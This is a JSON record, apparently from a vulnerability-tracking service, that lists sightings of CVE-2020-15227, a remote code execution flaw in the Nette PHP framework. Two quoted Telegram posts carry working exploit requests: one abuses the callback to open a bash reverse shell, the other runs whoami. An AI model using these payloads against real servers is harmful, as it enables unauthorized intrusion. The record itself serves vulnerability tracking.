{"vulnerability": "CVE-2020-15227", "sightings": [{"uuid": "490cc4c8-6b28-408e-baeb-792698a8cb71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-15227", "type": "seen", "source": "https://gist.github.com/eudard/6be5a0636723d724e97a3c20e13da1c7", "content": "", "creation_timestamp": "2025-02-08T21:53:56.000000Z"}, {"uuid": "e58aa078-b7e9-4c7f-92fc-1e47d35ab11d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-15227", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-11)", "content": "", "creation_timestamp": "2025-07-11T00:00:00.000000Z"}, {"uuid": "66d795bd-d944-4ffe-8ba3-e87d1d67970e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-15227", "type": "published-proof-of-concept", "source": "Telegram/EaZXyEQPXjVYpa1SXINAqbywJF-Pj4HRY17cm56ozh9m7g", "content": "", "creation_timestamp": "2024-04-12T02:30:07.000000Z"}, {"uuid": "4ac43c5a-03ba-47e8-ae86-1d85db847ed3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-15227", "type": "published-proof-of-concept", "source": "Telegram/GIyGo_IMJ9nUX7q7AuOTeizXLQM3W2gjIGrdLGaNLcimrw", "content": "", "creation_timestamp": "2024-04-15T17:14:45.000000Z"}, {"uuid": "606b3f1c-caa6-4f9a-8e85-b33a7976c944", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-15227", "type": "published-proof-of-concept", "source": "https://t.me/HackerOne/2787", "content": "CVE-2020-15227 PHP framework nette callback RCE\n\nPOC: /nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1\n@securation", "creation_timestamp": "2020-10-14T19:14:14.000000Z"}, {"uuid": "78501376-fa3e-452d-81df-81b89735a32f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-15227", "type": "seen", "source": "https://t.me/HackingInsights/5912", "content": "Attacks against the \"Nette\" PHP framework CVE-2020-15227, (Fri, Jul 12th)\nhttps://ift.tt/LpyGeoP", "creation_timestamp": "2024-07-12T19:10:30.000000Z"}, {"uuid": "d0dcd9a7-2733-4af9-a49f-68245809c2cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-15227", "type": "seen", "source": "https://t.me/ctinow/220151", "content": "Attacks against the \"Nette\" PHP framework CVE-2020-15227, (Fri, Jul 12th)\nhttps://ift.tt/LpyGeoP", "creation_timestamp": "2024-07-12T19:10:04.000000Z"}, {"uuid": "dd5b421a-c367-4212-9463-2e0910d5cc9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-15227", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2295", "content": "cve-2020-15227 nette\n\nGET  /nette.micro/?callback=shell_exec&cmd=whoami\n\nGET  /index.php/nette.micro/?callback=shell_exec&cmd=whoami\n\n#poc #exploit", "creation_timestamp": "2024-04-11T19:32:15.000000Z"}, {"uuid": "d21cf1f6-33ca-43f7-b4fc-a38920ad3ff7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-15227", "type": "published-proof-of-concept", "source": "Telegram/e6PvDjy4174rRu00KsomOgJ8pyrTDwRz7uzzWMAoRoiby0at", "content": "", "creation_timestamp": "2024-04-12T09:24:32.000000Z"}, {"uuid": "355931e1-6386-4f78-af58-d2163c2cace1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-15227", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10832", "content": "#exploit\n1. Unauthenticated SSRF on Havoc C2 teamserver via spoofed demon agent\nhttps://blog.chebuya.com/posts/server-side-request-forgery-on-havoc-c2\n\n2. Attacks against the \"Nette\" PHP framework (CVE-2020-15227)\nhttps://isc.sans.edu/forums/diary/Attacks+against+the+Nette+PHP+framework+CVE202015227/31076", "creation_timestamp": "2024-07-26T15:55:40.000000Z"}]}